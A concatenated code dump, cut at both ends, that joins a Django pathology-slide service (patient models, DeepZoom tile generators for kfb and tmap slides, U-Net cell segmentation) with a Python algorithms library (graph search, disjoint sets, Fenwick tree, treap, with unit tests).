create_time = models.DateTimeField(verbose_name=u'创建时间', auto_now_add=True)
update_time = models.DateTimeField(verbose_name=u'更新时间', auto_now=True)
class Meta:
db_table = 'tb_image' # 自定义数据库表的名称
verbose_name = '大图信息' # 在后台admin中显示表的中文名
verbose_name_plural = verbose_name
def __str__(self):
return '当前文件名为:%s' % self.file_name
```
#### File: QAS/Patient/models.py
```python
from django.db import models
class Patient(models.Model):
"""
患者信息
"""
GENDER_CHOICES = (
(1, "男"),
(0, "女"),
)
id = models.AutoField(primary_key=True, verbose_name=u'唯一主键')
# 个人信息
name = models.CharField(max_length=32, verbose_name=u"姓名", null=True, blank=True)
age = models.IntegerField(verbose_name=u"年龄", null=True, blank=True)
gender = models.CharField(max_length=8, default=0, choices=GENDER_CHOICES, verbose_name=u"性别")
num_no = models.CharField(max_length=32, verbose_name=u"编号", null=True, blank=True)
# 病理信息
specimen_source = models.CharField(max_length=32, verbose_name=u'标本来源', blank=True, null=True)
report_time = models.DateTimeField(verbose_name=u'报告时间', blank=True, null=True)
send_time = models.DateTimeField(verbose_name=u"送检时间", blank=True, null=True)
is_delete = models.BooleanField(verbose_name=u'是否逻辑删除', default=False)
create_time = models.DateTimeField(verbose_name=u"创建时间", auto_now_add=True)
update_time = models.DateTimeField(verbose_name=u"更新时间", auto_now=True)
def __str__(self):
return '用户名为:%s' % self.name
class Meta:
db_table = 'tb_patient' # 自定义数据库表的名称
verbose_name = u'患者信息'
verbose_name_plural = verbose_name
```
#### File: QAS/Patient/serializers.py
```python
from rest_framework import serializers
from .models import Patient
class SCPatientSerializer(serializers.ModelSerializer):
"""查增"""
report_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')
send_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')
class Meta:
model = Patient
fields = ('id', 'name', 'age', 'gender', 'specimen_source',
'num_no', 'report_time', 'send_time')
def validate_age(self, value):
"""验证年龄"""
if value:
if int(value) > 100 or int(value) < 10:
raise serializers.ValidationError('参数错误')
return value
class UPatientSerializer(serializers.ModelSerializer):
"""修改"""
report_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S', read_only=True)
send_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S', read_only=True)
class Meta:
model = Patient
fields = ('id', 'name', 'age', 'gender', 'specimen_source',
'num_no', 'report_time', 'send_time')
def validate_age(self, value):
"""验证年龄"""
if value:
if int(value) > 100 or int(value) < 10:
raise serializers.ValidationError('参数错误')
return value
```
#### File: Services/Aslide/deepzoom.py
```python
from openslide.deepzoom import DeepZoomGenerator as OpenSlideDZG
from Services.Aslide.kfb.kfb_deepzoom import DeepZoomGenerator as KfbDZG
from Services.Aslide.tmap.tmap_deepzoom import DeepZoomGenerator as TmapDZG
class ADeepZoomGenerator(object):
def __init__(self, osr, tile_size=254, overlap=1, limit_bounds=False):
if osr.format in ['.kfb', '.KFB']:
self._dzg = KfbDZG(osr, tile_size, overlap, limit_bounds)
elif osr.format in ['.tmap', '.TMAP']:
self._dzg = TmapDZG(osr, 256, overlap, limit_bounds)
else:
self._dzg = OpenSlideDZG(osr, tile_size, overlap, limit_bounds)
@property
def level_count(self):
"""The number of Deep Zoom levels in the image."""
return self._dzg.level_count
@property
def level_tiles(self):
"""A list of (tiles_x, tiles_y) tuples for each Deep Zoom level."""
return self._dzg.level_tiles
@property
def level_dimensions(self):
"""A list of (pixels_x, pixels_y) tuples for each Deep Zoom level."""
return self._dzg.level_dimensions
@property
def tile_count(self):
"""The total number of Deep Zoom tiles in the image."""
return self._dzg.tile_count
def get_dzi(self, format):
"""
:param format: the format of the individual tiles ('png' or 'jpeg')
:return: a string containing the XML metadata for the .dzi file.
"""
return self._dzg.get_dzi(format)
def get_tile(self, level, address):
"""
:param level: the Deep Zoom level
:param address: the address of the tile within the level as a (col, row) tuple.
:return: Return an RGB PIL.Image for a tile
"""
return self._dzg.get_tile(level, address)
if __name__ == '__main__':
filepath = "/home/stimage/Development/DATA/TEST_DATA/test001.kfb"
from aslide import Aslide
slide = Aslide(filepath)
dzg = ADeepZoomGenerator(slide)
print("level_count : ", dzg.level_count)
print("level_tiles : ", dzg.level_tiles)
print("level_dimensions : ", dzg.level_dimensions)
print("tile count : ", dzg.tile_count)
print("dzi : \n")
print(dzg.get_dzi('jpeg'))
tile = dzg.get_tile(13, (0, 0))
import matplotlib.pyplot as plt
plt.imshow(tile)
plt.show()
```
#### File: Aslide/tmap/tmap_deepzoom.py
```python
from io import BytesIO
from Services.Aslide.tmap import tmap_lowlevel, tmap_slide
from xml.etree.ElementTree import ElementTree, Element, SubElement
class DeepZoomGenerator(object):
def __init__(self, slide, tile_size=254, overlap=1, limit_bounds=False):
self.slide = slide
self._osr = slide._osr
self._z_t_downsample = tile_size
self._z_overlap = overlap
self._limit_bounds = limit_bounds
def get_tile(self, level, address):
"""Return an RGB PIL.Image for a tile.
level: the Deep Zoom level.
address: the address of the tile within the level as a (col, row)
tuple."""
level = self.slide.level_downsamples[level]
return tmap_lowlevel.get_tile_data(self._osr._osr, level, address[1], address[0])
def get_dzi(self, format):
"""Return a string containing the XML metadata for the .dzi file.
format: the format of the individual tiles ('png' or 'jpeg')"""
image = Element('Image', TileSize=str(self._z_t_downsample),
Overlap=str(self._z_overlap), Format=format,
xmlns='http://schemas.microsoft.com/deepzoom/2008')
w, h = self.slide.dimensions
SubElement(image, 'Size', Width=str(w), Height=str(h))
tree = ElementTree(element=image)
buf = BytesIO()
tree.write(buf, encoding='UTF-8')
return buf.getvalue().decode('UTF-8')
def main():
slide = tmap_slide.TmapSlide(
'/media/wqf/4adb4c9e-80d5-43fd-8bf8-c4d8f353091f/tsimage/tiffs_un/SZH1513139_N_4_20181220132441.TMAP')
dzg = DeepZoomGenerator(slide)
img = dzg.get_tile_data((110, 100))
img.show()
slide.close()
if __name__ == '__main__':
main()
```
#### File: Services/Unet/find_test_data.py
```python
import os
class FindNeed(object):
def __init__(self):
self.path = '/media/kyfq/f2b5b050-085b-4a49-b06d-f9e7e99e0abd/kyfq/cells_three/FUNGI'
# self.path = '/media/kyfq/f2b5b050-085b-4a49-b06d-f9e7e99e0abd/kyfq/cells_three/ACTINO'
self.res_list = {}
def run(self):
for pathology in os.listdir(self.path):
self.res_list.setdefault(pathology, {})
for cls in os.listdir(os.path.join(self.path, pathology)):
img_list = os.listdir(os.path.join(self.path, pathology, cls))
self.res_list[pathology].setdefault(cls, len(img_list))
def statistic(self):
for k, v in self.res_list.items():
if 'HSIL_S' in v and 'LSIL_E' in v and 'ASCUS' in v and 'SC' in v:
print('pathology: %s' % k,
'ASCUS: %s' % v.get('ASCUS'),
'LSIL_E: %s' % v.get('LSIL_E'),
'HSIL_S: %s' % v.get('HSIL_S'),
'SC: %s' % v.get('SC')
)
if __name__ == '__main__':
find_need = FindNeed()
find_need.run()
find_need.statistic()
```
#### File: Services/Unet/unetImp.py
```python
import os
import cv2
import numpy as np
import mxnet as mx
from collections import namedtuple
'''
prefix : prefix of model name
epoch : number of iterations of the model. model name = prefix + '-' + epoch + '.params'
seg_data_shape : initialize the network with input shape
batch_size : batch size
ctx : select gpu (mx.gpu(0))
return : the Unet model
'''
def get_segmentation_mod(prefix = './segnet_bb5_final', epoch = 0, seg_data_shape = 128, batch_size = 1, ctx = mx.gpu(0)):
sym, arg_params, aux_params = mx.model.load_checkpoint(prefix, epoch)
mod = mx.mod.Module(symbol=sym, context=ctx, data_names=['data'], label_names=None)
mod.bind(for_training=False, data_shapes=[('data', (batch_size, 3, seg_data_shape, seg_data_shape))], label_shapes=None)
mod.set_params(arg_params=arg_params, aux_params=aux_params)
return mod
'''
img : input original image
mod : Unet model
return : predicted results
'''
def seg_img(img, mod):
Batch = namedtuple('Batch', ['data'])
cls_mean_val = np.array([[[107]], [[107]], [[107]]])
cls_std_scale = 1.0
img = np.transpose(img, (2, 0, 1))
img = img[np.newaxis, :]
img = cls_std_scale * (img.astype(np.float32) - cls_mean_val)
mod.forward(Batch([mx.nd.array(img)]))
pred = mod.get_outputs()[0].asnumpy()
pred = np.argmax(pred, axis=1)[0]
return pred
'''
pred : predicted results from seg_img()
'''
def find_max_contour(pred):
img3, contours, hierarchy = cv2.findContours(pred, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
mask_contour = np.zeros_like(pred)
try:
cv2.drawContours(mask_contour, contours, 0, color=255, thickness=-1)
return mask_contour, contours
except:
return pred, contours
'''
img : original image
a : coefficient a, img * a + b
b : coefficient b, img * a + b
return : contrast enhanced image
'''
def contrast_brightness_image(img, a = 1.8, b = -90):
h, w, ch = img.shape
src2 = np.zeros([h, w, ch], img.dtype)
dst = cv2.addWeighted(img, a, src2, 1-a, b)
return dst
if __name__ == "__main__":
testdir = r'./data/test'
savedir = r'./test/'
imgfiles = [i for i in os.listdir(testdir) if i.endswith('.jpg')]
seg_mod = get_segmentation_mod()
print("done")
for i, fn in enumerate(imgfiles):
fn_path = testdir+'/'+fn
raw_img = cv2.imread(fn_path)
raw_img2 = contrast_brightness_image(raw_img)
# cv2.imwrite('./' + fn, raw_img)
pred = seg_img(raw_img2, seg_mod).astype(np.uint8)
pred, contours = find_max_contour(pred)
cv2.imwrite(savedir + fn.split('.')[0] + '.png', pred)
print('save image')
cv2.drawContours(raw_img, contours, 0, color=(0,255,0), thickness=1)
cv2.imwrite('/home/kyfq/Desktop/raw_img.png', raw_img)
cv2.imshow('origin', raw_img)
cv2.waitKey(0) # waitkey代表读取键盘的输入,括号里的数字代表等待多长时间,单位ms。 0代表一直等待
# ASCUS LSIL_E HSIL_S与SC的比值
``` |
{
"source": "JiniousChoi/encyclopedia-in-code",
"score": 4
} |
#### File: jpylib/jgraphs/_dfs.py
```python
def make_graph(edges, is_undirected=True):
''' @param edges: type of [(u::int, v::int)]
@param is_undirected
@return adjacent list '''
G = {}
for u,v in edges:
G.setdefault(u, [])
if is_undirected:
G.setdefault(v, [])
G[u].append(v)
if is_undirected:
G[v].append(u)
return G
def dfs_iterative(n, G, start):
''' @param n: total number of nodes
@param G: edges of adjacent list
@param start: where to start searching
@return None '''
stack = [[start, -1]] # [(node_no, edge_pointer)]
visited = [False for _ in range(n)]
while stack:
here, i = stack[-1]
if i==-1:
yield here
visited[here] = True
i += 1
for j in range(i, len(G[here])):
there = G[here][j]
if visited[there]:
continue
#assert not visited[there]
stack[-1][-1] = j+1
stack.append([there,-1])
break
else:
stack.pop(-1)
def count_components(n, G):
return len(sorted_topologies(n, G))
def topological_sort(n, G, start):
''' @return [node_no::int] '''
visited, topology_stack = [False for _ in range(n)], []
_dfs(n, G, start, visited, topology_stack)
return topology_stack[::-1]
def topological_sort_all(n, G):
''' @return [[node_no::int]] '''
visited = [False for _ in range(n)]
def dfs_all():
topology_stacks = []
for u in range(n):
if not visited[u]:
topology_stack = []
_dfs(n, G, u, visited, topology_stack)
topology_stacks.append(topology_stack[::-1])
return topology_stacks
return dfs_all()
def _dfs(n, G, here, visited, topology_stack):
visited[here] = True
for there in G.get(here, []):
if visited[there]: continue
_dfs(n, G, there, visited, topology_stack)
topology_stack.append(here) #post-order
import unittest
import random
class DFSTest(unittest.TestCase):
def setUp(self):
self.n1, self.edges1 = 5, [(0, 1), (1, 3), (3, 2), (3, 4), (4, 2)]
random.shuffle(self.edges1)
self.n2, self.edges2 = 6, [(1, 2), (2, 4), (4, 3), (4, 5), (5, 3)]
random.shuffle(self.edges2)
def test_dfs_iterative_basics(self):
G = make_graph([(0,1),(0,2),(0,3),(2,3)])
self.assertEqual(list(dfs_iterative(4, G, 0)), [0,1,2,3])
self.assertEqual(list(dfs_iterative(4, G, 1)), [1,0,2,3])
self.assertEqual(list(dfs_iterative(4, G, 2)), [2,0,1,3])
self.assertEqual(list(dfs_iterative(4, G, 3)), [3,0,1,2])
def test_topological_sort_basics(self):
n, G = self.n1, make_graph(self.edges1, is_undirected=False)
self.assertEqual(topological_sort(n,G,0), [0,1,3,4,2])
self.assertEqual(topological_sort(n,G,1), [1,3,4,2])
self.assertEqual(topological_sort(n,G,3), [3,4,2])
self.assertEqual(topological_sort(n,G,4), [4,2])
self.assertEqual(topological_sort(n,G,2), [2])
def test_topological_sort_undirected(self):
n, G = self.n1, make_graph(self.edges1, is_undirected=True)
self.assertTrue((topological_sort(n,G,0)==[0,1,3,2,4]) or (topological_sort(n,G,0)==[0,1,3,4,2]))
def test_topological_sort_all_basics(self):
n, G = self.n1, make_graph(self.edges1, is_undirected=False)
self.assertEqual(topological_sort_all(n, G), [[0,1,3,4,2]])
n, G = self.n2, make_graph(self.edges2, is_undirected=False)
self.assertEqual(topological_sort_all(n, G), [[0],[1,2,4,5,3]])
if __name__=="__main__":
unittest.main()
```
#### File: jpylib/jgraphs/_disjointsets.py
```python
class NaiveDisjointSets(object):
def __init__(self, n):
self.parents = [i for i in range(n)]
def union(self, u, v):
u,v = map(self.find, [u,v])
if u==v:
# This is not essential
return
self.parents[v] = u
def find(self, u):
while u != self.parents[u]:
u = self.parents[u]
return u
def components_count(self):
return len([i for i,p in enumerate(self.parents) if i==p])
class OptimizedDisjointSets(object):
def __init__(self, n):
self.parents = [i for i in range(n)]
self.ranks = [1 for i in range(n)]
def union(self, u, v):
# optimization by rank comparison
u,v = map(self.find, [u,v])
if u==v:
# this is essential for rank-adjusting optimization
return
u_rank, v_rank = self.ranks[u], self.ranks[v]
if self.ranks[u] < self.ranks[v]:
u, v = v, u
self.parents[v] = u
self.ranks[u] += self.ranks[v]
def find(self, u):
# optimization by path compression
lineage = []
while self.parents[u] != u:
lineage.append(u)
u = self.parents[u]
root = u
assert not lineage or lineage[-1] != u
for v in lineage:
self.parents[v] = root
return root
def components_count(self):
return len([i for i,p in enumerate(self.parents) if i==p])
StaticDisjointSets = OptimizedDisjointSets
class DynamicDisjointSets(OptimizedDisjointSets):
''' add-union-find data structure
If the whole number of nodes count cannot be estimated beforehand,
DynamicDisjointSets is preferable to the kind of StaticDIsjointSets above '''
def __init__(self):
self.parents = {}
self.ranks = {}
def add(self, u):
assert u not in self.parents
self.parents[u] = u
self.ranks[u] = 1
def has(self, u):
return u in self.parents
def components_count(self):
return len([k for k,p in self.parents.items() if k==p])
import unittest
class DisjointSetsTest(unittest.TestCase):
def setUp(self):
n1, edges1, components1 = 4, [], 4
n2, edges2, components2= 4, [(0,1),(2,1)], 2
n3, edges3, components3 = 4, [(0,1),(3,1),(2,3)], 1
self.test_set = [(n1, edges1, components1), (n2, edges2, components2), (n3, edges3, components3)]
def test_basics(self):
DSs = [NaiveDisjointSets, OptimizedDisjointSets]
for DS in DSs:
for n, edges, expected_components in self.test_set:
dsets = self.make_disjoint_sets(DS, n, edges)
self.assertEqual(dsets.components_count(), expected_components)
def make_disjoint_sets(self, clazz, n, edges):
dsets = clazz(n)
for u,v in edges:
dsets.union(u,v)
return dsets
class DynamicDisjointSetsTest(unittest.TestCase):
def test_find_largest_consecutive_sequence(self):
numbers = [100, 4, 200, 1, 3, 2, 100]
ddsets = DynamicDisjointSets()
ddsets.add(100)
for n in numbers:
if ddsets.has(n):
continue
ddsets.add(n)
if ddsets.has(n-1):
ddsets.union(n-1, n)
if ddsets.has(n+1):
ddsets.union(n, n+1)
max_seq = 0
for i,p in ddsets.parents.items():
if i==p:
max_seq = max(max_seq, ddsets.ranks[i])
self.assertEqual(max_seq, 4)
if __name__ == '__main__':
unittest.main()
```
#### File: jpylib/jmath/_bits.py
```python
from math import inf
def single_bit_ceil(n):
''' @return largest `1<<m` satisfying `2**m >= n`
Note: 1<<m == 2**m '''
if n==0: return 0
p = 1
while p < n:
p <<= 1
assert p >= n
return p
def single_bit_floor(n):
''' @return largest `1<<m` satisfying `2**m <= n`
Note: 1<<m == 2**m '''
if n==0: return 0
assert n > 0
nxt, cur = n, inf
while 0 < nxt:
cur = nxt
nxt &= nxt-1
assert 0 == nxt < cur <= n
return cur
import unittest
class BitsTest(unittest.TestCase):
def test_single_bit_ceil(self):
self.assertEqual(single_bit_floor(0), 0)
self.assertEqual(single_bit_ceil(1), 1)
self.assertEqual(single_bit_ceil(2), 2)
self.assertEqual(single_bit_ceil(3), 4)
self.assertEqual(single_bit_ceil(4), 4)
self.assertEqual(single_bit_ceil(5), 8)
self.assertEqual(single_bit_ceil(6), 8)
self.assertEqual(single_bit_ceil(7), 8)
self.assertEqual(single_bit_ceil(8), 8)
def test_single_bit_floor(self):
self.assertEqual(single_bit_floor(0), 0)
self.assertEqual(single_bit_floor(1), 1)
self.assertEqual(single_bit_floor(2), 2)
self.assertEqual(single_bit_floor(3), 2)
self.assertEqual(single_bit_floor(4), 4)
self.assertEqual(single_bit_floor(5), 4)
self.assertEqual(single_bit_floor(6), 4)
self.assertEqual(single_bit_floor(7), 4)
self.assertEqual(single_bit_floor(8), 8)
if __name__ == "__main__":
unittest.main()
```
#### File: jpylib/jmath/_factors.py
```python
def divisor_factors(n):
''' return [divisor]
i.e. 1 -> [1]
2 -> [1,2]
4 -> [1,2,4]
10 -> [1,2,5,10] '''
left, right = [], []
for f in range(1, int(n**.5)+1):
if n%f == 0:
l, r = f, n//f
left.append(l)
if l != r: right.append(r)
while right:
left.append(right.pop(-1))
#assert right == []
return left
def prime_factors(n):
''' return [prime_factor]
i.e. 4 -> [2,2]
6 -> [2,3]
7 -> [7]
9 -> [3,3]
12 -> [2,2,3] '''
assert n >= 1
factors = []
while n%2==0:
factors.append(2)
n //= 2
p = 3
while n > 1:
while n % p == 0:
factors.append(p)
n //= p
p += 2
assert n == 1
return factors
def gcd(a, b):
if b==0: return a
return gcd(b, a%b)
def lcm(a,b):
return a * b // gcd(a,b)
import unittest
class FactorsTest(unittest.TestCase):
def test_divisor_factors(self):
self.assertEqual(divisor_factors(1), [1])
self.assertEqual(divisor_factors(2), [1,2])
self.assertEqual(divisor_factors(4), [1,2,4])
self.assertEqual(divisor_factors(10), [1,2,5,10])
def test_prime_factors(self):
self.assertEqual(prime_factors(1), [])
self.assertEqual(prime_factors(2), [2])
self.assertEqual(prime_factors(4), [2,2])
self.assertEqual(prime_factors(6), [2,3])
self.assertEqual(prime_factors(7), [7])
self.assertEqual(prime_factors(9), [3,3])
self.assertEqual(prime_factors(12), [2,2,3])
class GCDTest(unittest.TestCase):
def test_basics(self):
self.assertEqual(gcd(1,1), 1)
self.assertEqual(gcd(1,3), 1)
self.assertEqual(gcd(3,1), 1)
self.assertEqual(gcd(3,7), 1)
self.assertEqual(gcd(2,2), 2)
self.assertEqual(gcd(2,4), 2)
self.assertEqual(gcd(55,11), 11)
class LCMTest(unittest.TestCase):
def test_basics(self):
self.assertEqual(lcm(1,1), 1)
self.assertEqual(lcm(1,3), 3)
self.assertEqual(lcm(3,1), 3)
self.assertEqual(lcm(3,7), 21)
self.assertEqual(lcm(2,2), 2)
self.assertEqual(lcm(2,4), 4)
self.assertEqual(lcm(55,11), 55)
if __name__ == "__main__":
unittest.main()
```
#### File: jpylib/jmath/_int.py
```python
def len_int(n):
''' @param n: number::int
@return number of digit count '''
assert n >= 0
digits = 0
while n > 0:
digits += 1
n //= 10
return digits
import unittest
class LenTest(unittest.TestCase):
def test_len_int(self):
with self.assertRaises(AssertionError):
len_int(-1)
self.assertEqual(len_int(0), 0)
self.assertEqual(len_int(1), 1)
self.assertEqual(len_int(10), 2)
self.assertEqual(len_int(99), 2)
self.assertEqual(len_int(555), 3)
if __name__ == "__main__":
unittest.main()
```
#### File: jpylib/jtests/_tests.py
```python
def parse_io(inp, out):
''' io means input/output for testcases;
It splitlines them and strip the elements
@param inp: multi-lined str
@param out: multi-lined str
@return (inp::[str], out::[str]) '''
inp = [i.strip() for i in inp.splitlines() if i.strip()]
out = [o.strip() for o in out.splitlines() if o.strip()]
return inp, out
def joiner(iterable, sep=' '):
''' @return e.g. [1, 2] -> "1 2" '''
return sep.join(map(str, iterable))
def strips(doc):
''' @return strip each line of doc '''
return '\n'.join(line.strip() for line in doc.splitlines())
def lstrips(doc):
''' @return lstrip each line of doc '''
return '\n'.join(line.lstrip() for line in doc.splitlines())
def rstrips(doc):
''' @return rstrip each line of doc '''
return '\n'.join(line.rstrip() for line in doc.splitlines())
```
#### File: jpylib/jtrees/_fenwicktree.py
```python
class FenwickTree(object):
''' a.k.a. Binary Indexed Tree '''
def __init__(self, sz):
self.sz = sz + 1 # add dummy head
self.tree = [0] * self.sz
def add_all(self, vals):
for pos, val in enumerate(vals):
self.add(pos, val)
def add(self, pos, val):
''' @param pos: 0-based
@param val '''
pos += 1 # 1-based
while pos < self.sz:
self.tree[pos] += val
pos += (pos & -pos)
def partial_sum(self, pos):
''' @param pos: 0-based
@return sum of A[0...pos] '''
if pos < 0: return 0
assert 0 <= pos < self.sz-1
pos += 1 # 1-based
psum = 0
while pos > 0:
psum += self.tree[pos]
pos &= pos-1
return psum
def range_sum(self, from0, to0):
''' both inclusive, both 0-based '''
assert 0 <= from0 <= to0 < self.sz # 0-based
return self.partial_sum(to0) - self.partial_sum(from0 - 1)
import unittest
def naive_sum(arr, l, r):
return sum(arr[l:r+1])
class FenwickTreeTest(unittest.TestCase):
def test_range_sum(self):
arr = [5,2,1,4,3]
sz = len(arr)
fenwick = FenwickTree(sz)
fenwick.add_all(arr)
# explicit cases
self.assertEqual(fenwick.range_sum(0,0), 5)
self.assertEqual(fenwick.range_sum(0,1), 7)
self.assertEqual(fenwick.range_sum(0,4), 15)
def test_range_sum_all(self):
arr = [5,2,1,4,3]
sz = len(arr)
fenwick = FenwickTree(sz)
fenwick.add_all(arr)
# all cases
for l in range(sz):
for r in range(l, sz):
self.assertEqual(fenwick.range_sum(l,r), naive_sum(arr,l,r))
if __name__ == "__main__":
unittest.main()
```
#### File: jpylib/jtrees/_tests.py
```python
from ._tree_traversers import traverse_pre_order, traverse_in_order
from queue import Queue
from math import inf
def assertEqualTreeTopologies(tree, nodes_in_preorder, nodes_in_inorder):
''' this tree topology comparison works only with tree with unique values '''
actual_nodes_in_preorder = list(n.val for n in traverse_pre_order(tree))
assert len(actual_nodes_in_preorder) == len(set(actual_nodes_in_preorder)), 'all values on the tree should be unique'
assert actual_nodes_in_preorder == nodes_in_preorder, 'pre-order should be the same {} == {}'.format(actual_nodes_in_preorder, nodes_in_preorder)
actual_nodes_in_inorder = list(n.val for n in traverse_in_order(tree))
assert actual_nodes_in_inorder == nodes_in_inorder, 'in-order should be the same {} == {}'.format(actual_nodes_in_inorder, nodes_in_inorder)
def is_full_tree_bfs(tree):
def all_has_both_children(nodes):
assert nodes
for node in nodes:
if not node.left:
return False
if not node.right:
return False
return True
def none_has_any_children(nodes):
for node in nodes:
if node.left:
return False
if node.right:
return False
return True
def get_children(nodes):
'''
returns a list of children nodes
ex) [n1, n2, ...]
'''
res = []
for node in nodes:
res.append(node.left)
res.append(node.right)
return res
assert tree
q = Queue()
#level = 0
root_level = [tree]
q.put(root_level)
while not q.empty():
nodes = q.get()
if all_has_both_children(nodes):
all_children = get_children(nodes)
q.put(all_children)
continue
elif none_has_any_children(nodes):
return True
else:
return False
assert False
def is_full_tree(node):
''' @param node
@return True if all nil nodes are the same level '''
def _is_full_tree(node, lv, nil_lv):
if not node:
if not nil_lv:
nil_lv.append(lv)
return True
else:
return nil_lv[0] == lv
assert node
if not _is_full_tree(node.left, lv+1, nil_lv):
return False
if not _is_full_tree(node.right, lv+1, nil_lv):
return False
return True
return _is_full_tree(node, 0, [])
def is_complete_tree(node):
def _is_complete_tree(node, lv, nil_lv):
if not node:
if not nil_lv:
nil_lv.append(lv)
return True
else:
#assert 1 <= len(nil_lv) <= 2
if len(nil_lv) == 1:
lv0 = nil_lv[0]
if lv0 == lv:
return True
if lv0 == lv+1:
nil_lv.append(lv)
return True
else:
return False
else:
_, lv1 = nil_lv
return lv1 == lv
if not _is_complete_tree(node.left, lv+1, nil_lv):
return False
if not _is_complete_tree(node.right, lv+1, nil_lv):
return False
return True
return _is_complete_tree(node, 0, [])
def is_bst1(node, left_boundary=-inf, right_boundary=inf):
if not node: return True
if not left_boundary < node.val <= right_boundary:
return False
return is_bst1(node.left, left_boundary, node.val) \
and is_bst1(node.right, node.val, right_boundary)
def is_bst2(node):
''' Space Complexity (except stackframe): O(n) '''
vals = list(n.val for n in traverse_in_order(node))
for a,b in zip(vals, vals[1:]):
if not a<=b:
return False
return True
def is_bst3(node):
''' Space Complexity (except stackframe): O(1) '''
from collections import deque
if not node:
return True
q = deque()
it = traverse_in_order(node)
for _ in range(2):
try:
q.append(next(it))
except:
return True
while len(q) == 2:
if not q[0].val <= q[1].val:
return False
q.popleft()
try:
next_val = next(it)
q.append(next_val)
except StopIteration:
pass
return True
is_bst = is_bst1
import unittest
from ._nodes import tree_builder
from .tree_samples import tree_full_1to3, tree_full_1to7, tree_full_1to15, \
tree_compelete_1to6, tree_no_complete2, tree_no_complete4, \
bst_true1, bst_true2, bst_true3, bst_true4, bst_true5, bst_true6, \
bst_false1, bst_false2
class IsFullTreeTest(unittest.TestCase):
def test_is_full_tree_bfs1(self):
self.assertTrue(is_full_tree_bfs(tree_full_1to3))
self.assertTrue(is_full_tree_bfs(tree_full_1to7))
self.assertTrue(is_full_tree_bfs(tree_full_1to15))
self.assertFalse(is_full_tree_bfs(tree_no_complete2))
self.assertFalse(is_full_tree_bfs(tree_no_complete4))
def test_is_full_tree(self):
self.assertTrue(is_full_tree(tree_full_1to3))
self.assertTrue(is_full_tree(tree_full_1to7))
self.assertTrue(is_full_tree(tree_full_1to15))
self.assertFalse(is_full_tree(tree_builder([1,2])))
self.assertFalse(is_full_tree(tree_compelete_1to6))
class IsCompleteTree(unittest.TestCase):
def test_is_complete_tree(self):
self.assertTrue(is_complete_tree(tree_builder([])))
self.assertTrue(is_complete_tree(tree_builder([1])))
self.assertTrue(is_complete_tree(tree_builder([1,2])))
self.assertTrue(is_complete_tree(tree_builder([1,2,3,4])))
self.assertTrue(is_complete_tree(tree_builder([1,2,3,4,5])))
self.assertTrue(is_complete_tree(tree_compelete_1to6))
self.assertTrue(is_complete_tree(tree_full_1to7))
self.assertFalse(is_complete_tree(tree_builder([1,None,3])))
self.assertFalse(is_complete_tree(tree_builder([1,2,3,4,None,6,7])))
self.assertFalse(is_complete_tree(tree_no_complete2))
self.assertFalse(is_complete_tree(tree_no_complete4))
class IsBinarySearchTreeTest(unittest.TestCase):
def test_basics(self):
methods_on_test = [is_bst1, is_bst2, is_bst3]
for method in methods_on_test:
self.assertTrue(method(bst_true1))
self.assertTrue(method(bst_true2))
self.assertTrue(method(bst_true3))
self.assertTrue(method(bst_true4))
self.assertTrue(method(bst_true5))
self.assertTrue(method(bst_true6))
self.assertTrue(method(tree_builder([4,2,6,2,4])))
self.assertFalse(method(bst_false1))
self.assertFalse(method(bst_false2))
self.assertFalse(method(tree_builder([4,2,6,1,5])))
if __name__=='__main__':
unittest.main()
```
#### File: jpylib/jtrees/_treap.py
```python
from ._nodes import TreeNode
from random import random, randint, shuffle
import sys
sys.setrecursionlimit(10000)
class TreapNode(TreeNode):
def __init__(self, val, priority):
super().__init__(val)
self.priority = priority
self.size = 1
def set_left(self, left):
self.left = left
self.resize()
return self
def set_right(self, right):
self.right = right
self.resize()
return self
def resize(self):
self.size = 1
if self.left:
self.size += self.left.size
if self.right:
self.size += self.right.size
def insert(root, node, key=lambda n: n):
''' @return current node '''
if not root: return node
if root.priority < node.priority:
lhs, rhs = split(root, node, key)
node.set_left(lhs)
node.set_right(rhs)
return node
elif key(root.val) < key(node.val):
return root.set_right(insert(root.right, node, key))
else:
return root.set_left(insert(root.left, node, key))
def split(node, pivot_node, key=lambda n: n):
''' @return (left, right) '''
if not node:
return (None, None)
if key(node.val) <= key(pivot_node.val): #todo: rather <= than <
lhs, rhs = split(node.right, pivot_node, key)
node.set_right(lhs)
return (node, rhs)
else:
lhs, rhs = split(node.left, pivot_node, key)
node.set_left(rhs)
return (lhs, node)
def delete(node, val):
''' Note: User should not call this method unless self is root of the treap
@return current node '''
if not node:
return None
if node.val == val:
return merge(node.left, node.right)
elif node.val < val:
return node.set_right(delete(node.right, val))
elif node.val > val:
return node.set_left(delete(node.left, val))
return node
def merge(left, right):
if not left: return right
if not right: return left
if left.priority >= right.priority: #todo: rather > than >=. test this with duplicate values
return left.set_right(merge(left.right, right))
else:
return right.set_left(merge(left, right.left))
def find(node, val, key=lambda n: n):
if not node: return None
if key(node.val) == val:
return node
elif key(node.val) < val:
return find(node.right, val, key)
else:
return find(node.left, val, key)
def get_size(root):
return root.size if root else 0
def get_priority(root):
return root.priority if root else 0
def kth(root, k):
if k < 0 or not root: return None
if root.size <= k: return None
left_sz = get_size(root.left)
if left_sz > k:
return kth(root.left, k)
elif left_sz == k:
return root
else:
return kth(root.right, k-1-left_sz)
def split_first_k(root, k):
if not root: return (None, None)
#if k <= 0: return (None, root) #auxiliary for efficiency
#if root.size <= k: return (root, None) #auxiliary efficiency
left_size = get_size(root.left)
if left_size >= k:
ll, lr = split_first_k(root.left, k)
root.set_left(lr)
return (ll, root)
else:
rl,rr = split_first_k(root.right, k-1-left_size)
root.set_right(rl)
return (root, rr)
def insert_at(root, k, node):
''' this operation could cause skewed treap
when called in particular orders because it incapacitates `priority`
Use this with caution, or better yet, consider AVL, RBT, etc
@return return new root '''
if not root:
return node
assert root
if k < 0: k = 0
if k > root.size: k = root.size
left_size = get_size(root.left)
if left_size > k:
return root.set_left(insert_at(root.left, k, node))
elif left_size == k:
l = root.left
root.set_left(None)
node.set_left(l)
node.set_right(root)
node.priority = max(map(get_priority, [node.left, node.right]))
return node
else:
return root.set_right(insert_at(root.right, k-1-left_size, node))
def delete_at(root, k):
''' return new root after deleting kth node
@param k: 0-based '''
if not root: return None
if k < 0: k = 0
if k >= root.size: k = root.size-1
